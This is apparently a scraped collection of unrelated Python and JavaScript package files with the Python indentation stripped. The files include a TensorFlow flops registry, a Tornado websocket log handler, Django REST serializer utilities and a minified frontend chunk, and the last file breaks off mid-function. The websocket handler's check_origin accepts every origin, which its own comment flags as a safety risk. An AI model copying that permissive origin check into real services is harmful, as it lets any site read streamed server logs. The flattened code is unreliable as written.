for j in range(len(args.div_ext_left)):
if args.bam_files is not None:
main(args.bam_files[i - 1], args.bam_parser[i - 1] if len(args.bam_parser) > 1 else args.bam_parser[0],
groups["divergent_calls"], groups["bidirectional_calls"], groups["unidirectional_calls"],
divergent_extension=(args.div_ext_left[j], args.div_ext_right[j]),
unidirectional_extension=(args.unidirectional_ext_left[j], args.unidirectional_ext_right[j]),
promoter_bed=args.promoter_bed)
else:
main((args.bw_pl[i - 1], args.bw_mn[i - 1]), None,
groups["divergent_calls"], groups["bidirectional_calls"], groups["unidirectional_calls"],
divergent_extension=(args.div_ext_left[j], args.div_ext_right[j]),
unidirectional_extension=(args.unidirectional_ext_left[j], args.unidirectional_ext_right[j]),
promoter_bed=args.promoter_bed) | PypiClean |
/pyblp-1.1.0.tar.gz/pyblp-1.1.0/docs/notebooks/api/.ipynb_checkpoints/data-checkpoint.ipynb | # Loading Data Example
```
import pyblp
pyblp.__version__
```
Any number of functions can be used to load the example data into memory. In this example, we'll first use [NumPy](https://numpy.org/).
```
import numpy as np
blp_product_data = np.recfromcsv(pyblp.data.BLP_PRODUCTS_LOCATION, encoding='utf-8')
blp_agent_data = np.recfromcsv(pyblp.data.BLP_AGENTS_LOCATION, encoding='utf-8')
```
Record arrays can be cumbersome to manipulate. A more flexible alternative is the [pandas](https://pandas.pydata.org/) DataFrame. Unlike NumPy, pyblp does not directly depend on pandas, but it can be useful when manipulating data.
```
import pandas as pd
blp_product_data = pd.read_csv(pyblp.data.BLP_PRODUCTS_LOCATION)
blp_agent_data = pd.read_csv(pyblp.data.BLP_AGENTS_LOCATION)
```
Another benefit of DataFrame objects is that they display nicely in Jupyter notebooks.
```
blp_product_data.head()
blp_agent_data.head()
```
[This tutorial](build_blp_instruments.ipynb) demonstrates how the instruments included in this dataset can be constructed from scratch.
| PypiClean |
/mis_modulos-0.1.tar.gz/mis_modulos-0.1/tensorflow/python/profiler/internal/flops_registry.py | """Register flops statistics for various TensorFlow operations.
"""
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import ops
# List of all ops which have implemented flops statistics.
IMPLEMENTED_OPS = set([
# Unary ops
"Reciprocal", "Square", "Rsqrt", "Log", "Neg", "AssignSub", "AssignAdd",
"L2Loss", "Softmax",
# Binary ops
"Add", "Sub", "Mul", "RealDiv", "Maximum", "Minimum", "Pow", "RsqrtGrad",
"GreaterEqual", "Greater", "LessEqual", "Less", "Equal", "NotEqual",
"SquaredDifference",
# Reduction ops
"Mean", "Sum", "ArgMax", "ArgMin", "BiasAddGrad",
# Convolution and pooling
"AvgPool", "MaxPool", "AvgPoolGrad", "MaxPoolGrad", "Conv2DBackpropInput",
"Conv2DBackpropFilter",
# Other ops
"AddN",
# Ops implemented in core tensorflow:
"MatMul", "Conv2D", "DepthwiseConv2dNative", "BiasAdd", "Dilation2D",
])
def _zero_flops(graph, node):
"""Returns zero flops."""
del graph, node # graph and node are unused
return ops.OpStats("flops", 0)
def _list_product(lst):
"""Computes product of element of the list."""
result = 1
for item in lst:
result *= item
return result
################################################################################
# Unary operations
################################################################################
def _unary_op_flops(graph, node, ops_per_element=1):
"""Common code which compute flops for unary operations."""
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
return ops.OpStats("flops", in_shape.num_elements() * ops_per_element)
@ops.RegisterStatistics("Reciprocal", "flops")
def _reciprocal_flops(graph, node):
"""Compute flops for Reciprocal operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("Square", "flops")
def _square_flops(graph, node):
"""Compute flops for Square operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("Rsqrt", "flops")
def _rsqrt_flops(graph, node):
"""Compute flops for Rsqrt operation."""
# Rsqrt(x) = 1 / sqrt(x)
return _unary_op_flops(graph, node, ops_per_element=2)
@ops.RegisterStatistics("Log", "flops")
def _log_flops(graph, node):
"""Compute flops for Log operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("Neg", "flops")
def _neg_flops(graph, node):
"""Compute flops for Neg operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("AssignSub", "flops")
def _assign_sub_flops(graph, node):
"""Compute flops for AssignSub operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("AssignAdd", "flops")
def _assign_add_flops(graph, node):
"""Compute flops for AssignAdd operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("L2Loss", "flops")
def _l2_loss_flops(graph, node):
"""Compute flops for L2Loss operation."""
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
# Tensorflow uses inefficient implementation, with (3*N-1) flops:
# Optimal implementation is 2*N flops
return ops.OpStats("flops", in_shape.num_elements() * 3 - 1)
@ops.RegisterStatistics("Softmax", "flops")
def _softmax_flops(graph, node):
"""Compute flops for Softmax operation."""
# Softmax implemetation:
#
# Approximate flops breakdown:
# 2*n -- compute shifted logits
# n -- exp of shifted logits
# 2*n -- compute softmax from exp of shifted logits
return _unary_op_flops(graph, node, ops_per_element=5)
################################################################################
# Binary operations
################################################################################
def _binary_per_element_op_flops(graph, node, ops_per_element=1):
"""Common code which compute flops for binary operations."""
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
return ops.OpStats("flops", out_shape.num_elements() * ops_per_element)
@ops.RegisterStatistics("Add", "flops")
def _add_flops(graph, node):
"""Compute flops for Add operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Sub", "flops")
def _sub_flops(graph, node):
"""Compute flops for Sub operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Mul", "flops")
def _mul_flops(graph, node):
"""Compute flops for Mul operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("RealDiv", "flops")
def _real_div_flops(graph, node):
"""Compute flops for RealDiv operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Maximum", "flops")
def _maximum_flops(graph, node):
"""Compute flops for Maximum operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Minimum", "flops")
def _minimum_flops(graph, node):
"""Compute flops for Minimum operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Pow", "flops")
def _pow_flops(graph, node):
"""Compute flops for Pow operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("RsqrtGrad", "flops")
def _rsqrt_grad_flops(graph, node):
"""Compute flops for RsqrtGrad operation."""
return _binary_per_element_op_flops(graph, node, ops_per_element=4)
@ops.RegisterStatistics("GreaterEqual", "flops")
def _greater_equal_flops(graph, node):
"""Compute flops for GreaterEqual operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Greater", "flops")
def _greater_flops(graph, node):
"""Compute flops for Greater operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("LessEqual", "flops")
def _less_equal_flops(graph, node):
"""Compute flops for LessEqual operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Less", "flops")
def _less_flops(graph, node):
"""Compute flops for Less operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Equal", "flops")
def _equal_flops(graph, node):
"""Compute flops for Equal operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("NotEqual", "flops")
def _not_equal_flops(graph, node):
"""Compute flops for NotEqual operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("SquaredDifference", "flops")
def _squared_difference_flops(graph, node):
"""Compute flops for SquaredDifference operation."""
return _binary_per_element_op_flops(graph, node, ops_per_element=2)
################################################################################
# Reduction ops
################################################################################
def _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0):
"""Common code which compute flops for reduction operations."""
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
num_flops = (in_shape.num_elements() * reduce_flops
+ out_shape.num_elements() * (finalize_flops - reduce_flops))
return ops.OpStats("flops", num_flops)
@ops.RegisterStatistics("Mean", "flops")
def _mean_flops(graph, node):
"""Compute flops for Mean operation."""
# reduction - sum, finalization - divide
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=1)
@ops.RegisterStatistics("Sum", "flops")
def _sum_flops(graph, node):
"""Compute flops for Sum operation."""
# reduction - sum, no finalization
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
@ops.RegisterStatistics("ArgMax", "flops")
def _arg_max_flops(graph, node):
"""Compute flops for ArgMax operation."""
# reduction - comparison, no finalization
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
@ops.RegisterStatistics("ArgMin", "flops")
def _arg_min_flops(graph, node):
"""Compute flops for ArgMin operation."""
# reduction - comparison, no finalization
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
@ops.RegisterStatistics("BiasAddGrad", "flops")
def _bias_add_grad_flops(graph, node):
"""Compute flops for BiasAddGrad operation."""
# Implementation of BiasAddGrad, essentially it's a reduce sum and reshaping:
# So computing flops same way as for "Sum"
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
################################################################################
# Convolution and pooling
# Note: all flops statistics are implemented only for NHWC data format
################################################################################
def _verify_conv_data_format(node):
"""Verifies data format for pooling and convolutional operations."""
# TODO(xpan): P1: Support NCHW
if node.attr["data_format"].s != b"NHWC":
raise ValueError("Only NHWC format is supported in flops computations")
def _pool_flops(graph, node):
"""Common code which compute flops for pooling operations."""
# compute flops for average and max pooling
_verify_conv_data_format(node)
#
# Pooling declaration:
# Inputs:
# - value
# Outputs:
# - output
# Attributes:
# - ksize
# - strides
# - padding
# - data_format
#
# Pooling implemetation:
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
kernel_shape = list(node.attr["ksize"].list.i)
kernel_area = _list_product(kernel_shape)
return ops.OpStats("flops", kernel_area * out_shape.num_elements())
@ops.RegisterStatistics("AvgPool", "flops")
def _avg_pool_flops(graph, node):
"""Compute flops for AvgPool operation."""
return _pool_flops(graph, node)
@ops.RegisterStatistics("MaxPool", "flops")
def _max_pool_flops(graph, node):
"""Compute flops for MaxPool operation."""
return _pool_flops(graph, node)
@ops.RegisterStatistics("AvgPoolGrad", "flops")
def _avg_pool_grad_flops(graph, node):
"""Compute flops for AvgPoolGrad operation."""
_verify_conv_data_format(node)
# Pooling gradient implementation:
out_backprop_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
out_backprop_shape.assert_is_fully_defined()
kernel_shape = list(node.attr["ksize"].list.i)
kernel_area = _list_product(kernel_shape)
# TensorFlow multiply each element of pooling window by coefficient,
# then sum up all of them, thus we have 2 flops per element:
# More optimal implementation - if division is done after.
return ops.OpStats("flops",
kernel_area * out_backprop_shape.num_elements() * 2)
@ops.RegisterStatistics("MaxPoolGrad", "flops")
def _max_pool_grad_flops(graph, node):
"""Compute flops for MaxPoolGrad operation."""
_verify_conv_data_format(node)
#
# MaxPoolGrad declaration:
# Inputs:
# - orig_input -- original input tensor (of max_pool)
# - orig_output -- original output tensor (of max_pool)
# - grad -- gradient with respect to output of max_pool
# Outputs:
# - output -- gradient with respect to input of max_pool
# Attributes:
# - ksize
# - strides
# - padding
# - data_format
# It computes MaxPool first, then one flop per each element of original output
#
kernel_shape = list(node.attr["ksize"].list.i)
kernel_area = _list_product(kernel_shape)
orig_out_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
orig_out_shape.assert_is_fully_defined()
max_pool_ops = kernel_area * orig_out_shape.num_elements()
return ops.OpStats("flops", max_pool_ops + orig_out_shape.num_elements())
@ops.RegisterStatistics("Conv2DBackpropInput", "flops")
def _conv_2d_backprop_input_flops(graph, node):
"""Compute flops for Conv2DBackpropInput operation."""
# Formula:
# batch_size * image_x_dim * image_y_dim * kernel_x_dim * kernel_y_dim
# * input_depth * output_depth * 2 / (image_x_stride * image_x_stride)
#
# Where:
# image_x_dim, image_y_dim and input_depth --- size of input to source (no
# backprop) convolution, in other words they are sizes of backprop output.
# output_depth --- number of filters in the original convolution, thus
# depth of backprop input.
# kernel_x_dim and kernel_y_dim --- sizes of filter in spatial dimension
# image_x_stride and image_x_stride --- strides of the convolution
#
_verify_conv_data_format(node)
# out_shape = [batch_size, image_y_dim, image_x_dim, input_depth]
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
# kernel_shape = [kernel_y_dim, kernel_x_dim, input_depth, output_depth]
kernel_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
kernel_shape.assert_is_fully_defined()
# strides
strides_shape = list(node.attr["strides"].list.i)
strides_product = strides_shape[1] * strides_shape[2]
return ops.OpStats("flops",
(2 * out_shape.num_elements()
* kernel_shape.num_elements()
/ (out_shape.dims[-1].value * strides_product)))
@ops.RegisterStatistics("Conv2DBackpropFilter", "flops")
def _conv_2d_backprop_filter_flops(graph, node):
"""Compute flops for Conv2DBackpropFilter operation."""
# Formula same as for Conv2DBackpropInput:
# batch_size * image_x_dim * image_y_dim * kernel_x_dim * kernel_y_dim
# * input_depth * output_depth * 2 / (image_x_stride * image_x_stride)
#
_verify_conv_data_format(node)
# image_shape = [batch_size, image_y_dim, image_x_dim, input_depth]
image_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
image_shape.assert_is_fully_defined()
# kernel_shape = [kernel_y_dim, kernel_x_dim, input_depth, output_depth]
kernel_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
kernel_shape.assert_is_fully_defined()
# strides
strides_shape = list(node.attr["strides"].list.i)
strides_product = strides_shape[1] * strides_shape[2]
return ops.OpStats("flops",
(2 * image_shape.num_elements()
* kernel_shape.num_elements()
/ (image_shape.dims[-1].value * strides_product)))
################################################################################
# Other ops
################################################################################
@ops.RegisterStatistics("AddN", "flops")
def _add_n_flops(graph, node):
"""Compute flops for AddN operation."""
if not node.input:
return _zero_flops(graph, node)
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
return ops.OpStats("flops", in_shape.num_elements() * (len(node.input) - 1)) | PypiClean |
/jot_iris-1.20.7-py3-none-any.whl/listener/logs_web_socket.py | import logging
import asyncio
import tornado
import tornado.websocket
class WebsocketStreamHandler(logging.StreamHandler):
def __init__(self, websocket, on_close, logger):
super().__init__(self)
self.websocket = websocket
self.loop = websocket.loop
self.on_close = on_close
self.logger = logger
self.loop.set_exception_handler(self.exception_handler)
self.write_error = True
def emit(self, record):
self.websocket.send(record)
def write(self, record):
record = record.rstrip()
if record: # and: not self.websocket.closed:
self.loop.call_soon_threadsafe(self.websocket.write_message, record)
def flush(self):
pass
def exception_handler(self, loop, context):
self.on_close()
# Report error only once
if self.write_error:
self.logger.error(context)
self.write_error = False
class LogsWebSocketHandler(tornado.websocket.WebSocketHandler):
"""
Note that Tornado uses asyncio. Since we are using threads on our backend
we need to use call_soon_threadsafe to get messages through.
"""
def __init__(self, application, request, **kwargs):
self._logger = None
self._stream_handler = None
super().__init__(application, request, **kwargs)
self.loop = asyncio.get_event_loop() # pylint: disable=W0201
def open(self, *args, **kwargs):
"""Called when websocket is opened"""
self._logger = logging.getLogger()
ws_logger = logging.getLogger('websocket')
# Get handler which is configured is logging.yaml
handler = list(filter(
lambda x: x.name is not None and x.name.lower() == 'websocket',
ws_logger.handlers))[0]
weblogger = WebsocketStreamHandler(self, self.on_close, self._logger)
self._stream_handler = logging.StreamHandler(weblogger)
self._stream_handler.formatter = handler.formatter
self._stream_handler.level = handler.level
self._logger.addHandler(self._stream_handler)
self._logger.info('Websocket logger connected')
def on_close(self):
"""Called when websocket is closed"""
if self._stream_handler is not None:
self._logger.removeHandler(self._stream_handler)
self._stream_handler = None
def on_message(self, message):
"""Called when message comes from client through websocket"""
# self.write_message("echo: %r" % message)
def check_origin(self, origin): # pylint: disable=R0201, W0613
"""Checks whether websocket connection from origin is allowed.
We will allow all connection which is actually potential safety risk. See:
https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.check_origin
"""
return True
def data_received(self, chunk):
pass | PypiClean |
/safegate-pro-frontend-20210805.0.tar.gz/safegate-pro-frontend-20210805.0/hass_frontend/frontend_latest/chunk.21bdce81c44342769b60.js | (self.webpackChunkhome_assistant_frontend=self.webpackChunkhome_assistant_frontend||[]).push([[5374,4074,655,4159,9978,272,4328,7082,129,1422,4823],{99257:(t,e,r)=>{"use strict";r(65233);var o=r(15112),l=r(9672),s=r(87156);(0,l.k)({is:"iron-iconset-svg",properties:{name:{type:String,observer:"_nameChanged"},size:{type:Number,value:24},rtlMirroring:{type:Boolean,value:!1},useGlobalRtlAttribute:{type:Boolean,value:!1}},created:function(){this._meta=new o.P({type:"iconset",key:null,value:null})},attached:function(){this.style.display="none"},getIconNames:function(){return this._icons=this._createIconMap(),Object.keys(this._icons).map((function(t){return this.name+":"+t}),this)},applyIcon:function(t,e){this.removeIcon(t);var r=this._cloneIcon(e,this.rtlMirroring&&this._targetIsRTL(t));if(r){var o=(0,s.vz)(t.root||t);return o.insertBefore(r,o.childNodes[0]),t._svgIcon=r}return null},removeIcon:function(t){t._svgIcon&&((0,s.vz)(t.root||t).removeChild(t._svgIcon),t._svgIcon=null)},_targetIsRTL:function(t){if(null==this.__targetIsRTL)if(this.useGlobalRtlAttribute){var e=document.body&&document.body.hasAttribute("dir")?document.body:document.documentElement;this.__targetIsRTL="rtl"===e.getAttribute("dir")}else t&&t.nodeType!==Node.ELEMENT_NODE&&(t=t.host),this.__targetIsRTL=t&&"rtl"===window.getComputedStyle(t).direction;return this.__targetIsRTL},_nameChanged:function(){this._meta.value=null,this._meta.key=this.name,this._meta.value=this,this.async((function(){this.fire("iron-iconset-added",this,{node:window})}))},_createIconMap:function(){var t=Object.create(null);return(0,s.vz)(this).querySelectorAll("[id]").forEach((function(e){t[e.id]=e})),t},_cloneIcon:function(t,e){return this._icons=this._icons||this._createIconMap(),this._prepareSvgClone(this._icons[t],this.size,e)},_prepareSvgClone:function(t,e,r){if(t){var o=t.cloneNode(!0),l=document.createElementNS("http://www.w3.org/2000/svg","svg"),s=o.getAttribute("viewBox")||"0 0 "+e+" "+e,i="pointer-events: none; display: block; width: 100%; height: 100%;";return r&&o.hasAttribute("mirror-in-rtl")&&(i+="-webkit-transform:scale(-1,1);transform:scale(-1,1);transform-origin:center;"),l.setAttribute("viewBox",s),l.setAttribute("preserveAspectRatio","xMidYMid meet"),l.setAttribute("focusable","false"),l.style.cssText=i,l.appendChild(o).removeAttribute("id"),l}return null}})},67810:(t,e,r)=>{"use strict";r.d(e,{o:()=>l});r(65233);var o=r(87156);const l={properties:{scrollTarget:{type:HTMLElement,value:function(){return this._defaultScrollTarget}}},observers:["_scrollTargetChanged(scrollTarget, isAttached)"],_shouldHaveListener:!0,_scrollTargetChanged:function(t,e){if(this._oldScrollTarget&&(this._toggleScrollListener(!1,this._oldScrollTarget),this._oldScrollTarget=null),e)if("document"===t)this.scrollTarget=this._doc;else if("string"==typeof t){var r=this.domHost;this.scrollTarget=r&&r.$?r.$[t]:(0,o.vz)(this.ownerDocument).querySelector("#"+t)}else this._isValidScrollTarget()&&(this._oldScrollTarget=t,this._toggleScrollListener(this._shouldHaveListener,t))},_scrollHandler:function(){},get _defaultScrollTarget(){return this._doc},get _doc(){return this.ownerDocument.documentElement},get _scrollTop(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageYOffset:this.scrollTarget.scrollTop:0},get _scrollLeft(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageXOffset:this.scrollTarget.scrollLeft:0},set _scrollTop(t){this.scrollTarget===this._doc?window.scrollTo(window.pageXOffset,t):this._isValidScrollTarget()&&(this.scrollTarget.scrollTop=t)},set _scrollLeft(t){this.scrollTarget===this._doc?window.scrollTo(t,window.pageYOffset):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=t)},scroll:function(t,e){var r;"object"==typeof t?(r=t.left,e=t.top):r=t,r=r||0,e=e||0,this.scrollTarget===this._doc?window.scrollTo(r,e):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=r,this.scrollTarget.scrollTop=e)},get _scrollTargetWidth(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerWidth:this.scrollTarget.offsetWidth:0},get _scrollTargetHeight(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerHeight:this.scrollTarget.offsetHeight:0},_isValidScrollTarget:function(){return this.scrollTarget instanceof HTMLElement},_toggleScrollListener:function(t,e){var r=e===this._doc?window:e;t?this._boundScrollHandler||(this._boundScrollHandler=this._scrollHandler.bind(this),r.addEventListener("scroll",this._boundScrollHandler)):this._boundScrollHandler&&(r.removeEventListener("scroll",this._boundScrollHandler),this._boundScrollHandler=null)},toggleScrollListener:function(t){this._shouldHaveListener=t,this._toggleScrollListener(t,this.scrollTarget)}}},25782:(t,e,r)=>{"use strict";r(65233),r(65660),r(70019),r(97968);var o=r(9672),l=r(50856),s=r(33760);(0,o.k)({_template:l.d`
<style include="paper-item-shared-styles"></style>
<style>
:host {
@apply --layout-horizontal;
@apply --layout-center;
@apply --paper-font-subhead;
@apply --paper-item;
@apply --paper-icon-item;
}
.content-icon {
@apply --layout-horizontal;
@apply --layout-center;
width: var(--paper-item-icon-width, 56px);
@apply --paper-item-icon;
}
</style>
<div id="contentIcon" class="content-icon">
<slot name="item-icon"></slot>
</div>
<slot></slot>
`,is:"paper-icon-item",behaviors:[s.U]})},89194:(t,e,r)=>{"use strict";r(65233),r(65660),r(70019);var o=r(9672),l=r(50856);(0,o.k)({_template:l.d`
<style>
:host {
overflow: hidden; /* needed for text-overflow: ellipsis to work on ff */
@apply --layout-vertical;
@apply --layout-center-justified;
@apply --layout-flex;
}
:host([two-line]) {
min-height: var(--paper-item-body-two-line-min-height, 72px);
}
:host([three-line]) {
min-height: var(--paper-item-body-three-line-min-height, 88px);
}
:host > ::slotted(*) {
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
:host > ::slotted([secondary]) {
@apply --paper-font-body1;
color: var(--paper-item-body-secondary-color, var(--secondary-text-color));
@apply --paper-item-body-secondary;
}
</style>
<slot></slot>
`,is:"paper-item-body"})},40417:(t,e,r)=>{"use strict";r.d(e,{l:()=>i});var o=r(99602),l=r(55122);const s={},i=(0,l.XM)(class extends l.Xe{constructor(){super(...arguments),this.$t=s}render(t,e){return e()}update(t,[e,r]){if(Array.isArray(e)){if(Array.isArray(this.$t)&&this.$t.length===e.length&&e.every(((t,e)=>t===this.$t[e])))return o.Jb}else if(this.$t===e)return o.Jb;return this.$t=Array.isArray(e)?Array.from(e):e,this.render(e,r)}})}}]);
//# sourceMappingURL=chunk.21bdce81c44342769b60.js.map | PypiClean |
/django_cool-1.2.8-py3-none-any.whl/cool/views/utils.py | import copy
from collections import OrderedDict
from importlib import import_module
from django.conf import settings
from django.core.validators import (
BaseValidator, ProhibitNullCharactersValidator,
)
from django.db import models
from django.db.models import NOT_PROVIDED
from django.shortcuts import render
from django.template.loader import render_to_string
from django.utils.translation import gettext as _
from rest_framework import fields, serializers, validators
from rest_framework.fields import empty
from rest_framework.serializers import ModelSerializer
from rest_framework.utils import model_meta
from rest_framework.utils.serializer_helpers import BindingDict
from cool.views.error_code import ErrorCode
from cool.views.view import CoolBFFAPIView
def parse_validation_error(data):
"""
参数检查结果处理
"""
from django.core.exceptions import ValidationError
from rest_framework.exceptions import (
ValidationError as RestValidationError,
)
if isinstance(data, ValidationError):
if hasattr(data, 'error_dict'):
return parse_validation_error(dict(data))
return parse_validation_error(list(data))
elif isinstance(data, RestValidationError):
return parse_validation_error(data.detail)
elif isinstance(data, dict):
return {key: parse_validation_error(value) for key, value in data.items()}
elif isinstance(data, list):
return [parse_validation_error(item) for item in data]
else:
return data
def get_rest_field_from_model_field(model, model_field, **kwargs):
"""
通过model字段自动生成rest framework字段
"""
if isinstance(model_field, models.Field):
model_field = model_field.name
s = ModelSerializer()
info = model_meta.get_field_info(model)
for field_name, relation_info in info.forward_relations.items():
if relation_info.to_many:
continue
field = relation_info.model_field
target_field = field
verbose_name = [target_field.verbose_name]
help_text = [target_field.help_text]
while target_field.remote_field:
target_field = target_field.target_field
verbose_name.append(target_field.verbose_name)
help_text.append(target_field.help_text)
target_field = copy.deepcopy(target_field)
target_field.verbose_name = " - ".join(filter(lambda x: x, verbose_name))
target_field.help_text = " - ".join(filter(lambda x: x, help_text))
for attr in ('primary_key', 'blank', 'null', 'default', 'editable', 'serialize'):
if hasattr(field, attr):
setattr(target_field, attr, getattr(field, attr))
info.fields_and_pk[field.name] = target_field
try:
info.fields_and_pk[field.attname] = target_field
except AttributeError:
pass
field_info = info.fields_and_pk[model_field]
field_class, field_kwargs = s.build_field(model_field, info, model, 0)
field_kwargs.pop('read_only', None)
gen_validators = field_kwargs.pop('validators', None)
if gen_validators:
gen_validators = list(filter(
lambda x: not isinstance(x, (
validators.UniqueValidator, validators.BaseUniqueForValidator, ProhibitNullCharactersValidator
)),
gen_validators
))
if gen_validators:
field_kwargs['validators'] = gen_validators
field_kwargs = s.include_extra_kwargs(field_kwargs, kwargs)
if not field_kwargs.get('required') and 'default' not in field_kwargs:
field_kwargs['default'] = None if field_info.default is NOT_PROVIDED else field_info.default
if field_class is fields.BooleanField and field_kwargs['default'] is None:
field_class = fields.NullBooleanField
field_kwargs.pop('allow_null', None)
if not ('default' in kwargs or 'required' in kwargs or field_kwargs.get('required') or field_kwargs['default']):
if (not field_kwargs.get('allow_null', False) and field_kwargs['default'] is None) \
or (not field_kwargs.get('allow_blank', False) and not field_kwargs['default']):
field_kwargs['required'] = True
field_kwargs.pop('default')
return field_class(**field_kwargs)
def get_field_info(field):
"""
获取字段信息
"""
field_type = field.__class__.__name__
if field_type.endswith("Field") and field_type != 'Field':
field_type = field_type[:-5]
info = {
'__field__': field,
'label': str(field.label),
'type': field_type,
'default': field.default,
'default_format': '' if field.default is empty else field.default,
'required': field.required,
'required_format': _('Yes') if field.required is True else _('No'),
'help_text': field.help_text,
'extend_info': OrderedDict()
}
field_validators = [field]
field_validators.extend(getattr(field, 'validators', list()))
validator_keys = ['max_value', 'min_value', 'max_length', 'min_length', 'max_digits', 'max_decimal_places',
'choices', 'regex', 'allowed_extensions', 'sep', 'child', 'is_list', 'children', 'serializer']
for validator in field_validators:
for k in validator_keys:
if k == 'choices' and not isinstance(field, fields.ChoiceField):
continue
v = getattr(validator, k, None)
if v is not None:
v = getattr(v, 'pattern', v)
info['extend_info'].setdefault(k, list()).append(v)
if isinstance(validator, BaseValidator):
info['extend_info'].setdefault(validator.code, list()).append(validator.limit_value)
for k in ['max_value', 'max_length', 'max_digits', 'max_decimal_places']:
if k in info['extend_info']:
info['extend_info'][k] = min(info['extend_info'][k])
for k in ['min_value', 'min_length']:
if k in info['extend_info']:
info['extend_info'][k] = max(info['extend_info'][k])
for k in info['extend_info']:
if not isinstance(info['extend_info'][k], list):
continue
if len(info['extend_info'][k]) == 1:
info['extend_info'][k] = info['extend_info'][k].pop()
if 'choices' in info['extend_info']:
info['extend_info'].pop('max_value', None)
info['extend_info'].pop('min_value', None)
if isinstance(field, serializers.BaseSerializer):
if 'child' not in info['extend_info'] and 'children' not in info['extend_info']:
info['extend_info']['detail'] = getattr(field, 'fields', None)
def _format_info(_info):
if isinstance(_info, list):
return "[%s]" % _format_info(_info[0])
if not isinstance(_info, dict):
return ""
if '__field__' in _info:
return _("(%s %s default:%s,required:%s,%s %s)") % (
_info['label'],
_info['type'],
_info['default_format'],
_info['required_format'],
_info['extend_info_format'],
_info['help_text']
)
else:
ret = "; ".join(["%s:%s" % (_k, _format_info(_v)) for _k, _v in _info.items()])
return "{ %s }" % ret
def _format_value(_value):
if isinstance(_value, list):
return ",".join(map(lambda x: _format_value(x) if isinstance(x, dict) else x, _value))
elif isinstance(_value, (dict, BindingDict)):
return ",".join(["%s:%s" % (_k, _format_value(_v)) for _k, _v in _value.items()])
elif isinstance(_value, type) and issubclass(_value, serializers.Serializer):
_info = get_serializer_field_info(_value())
return _format_info(_info)
elif isinstance(_value, fields.Field):
_info = get_field_info(_value)
return _format_info(_info)
else:
return _value
info['extend_info_format'] = "; ".join(["%s:%s" % (k, _format_value(v)) for k, v in info['extend_info'].items()])
return info
def get_serializer_field_info(serializer_obj, force_many=False):
from . import serializer
ret = dict()
if isinstance(serializer_obj, serializer.RecursiveField):
serializer_obj = serializer_obj.get_parent_proxy(2)
if not isinstance(serializer_obj, serializer.RecursiveField):
for field_name, field in serializer_obj.fields.items():
if hasattr(field, 'fields'):
ret[field_name] = get_serializer_field_info(field)
elif hasattr(field, 'child'):
ret[field_name] = get_serializer_field_info(field.child, force_many=True)
elif hasattr(field, 'child_relation'):
ret[field_name] = get_serializer_field_info(field.child_relation, force_many=True)
else:
ret[field_name] = get_field_info(field)
return [ret] if force_many else ret
def get_list_info(serializer_obj):
"""
获取列表序列化信息
"""
from . import serializer
child = serializer_obj.child
if isinstance(child, serializer.RecursiveField):
child = child.get_parent_proxy(2)
if hasattr(child, 'fields'):
return get_serializer_info(child, force_many=True)
return [str(serializer_obj.label)]
def get_serializer_info(serializer_obj, force_many=False):
"""
获取序列化信息
"""
from . import serializer
ret = dict()
for field_name, field in serializer_obj.fields.items():
if isinstance(field, serializer.RecursiveField):
field = field.get_parent_proxy(2)
if hasattr(field, 'fields'):
ret[field_name] = get_serializer_info(field)
elif hasattr(field, 'child'):
ret[field_name] = get_list_info(field)
elif hasattr(field, 'child_relation'):
ret[field_name] = [str(field.child_relation.label)]
else:
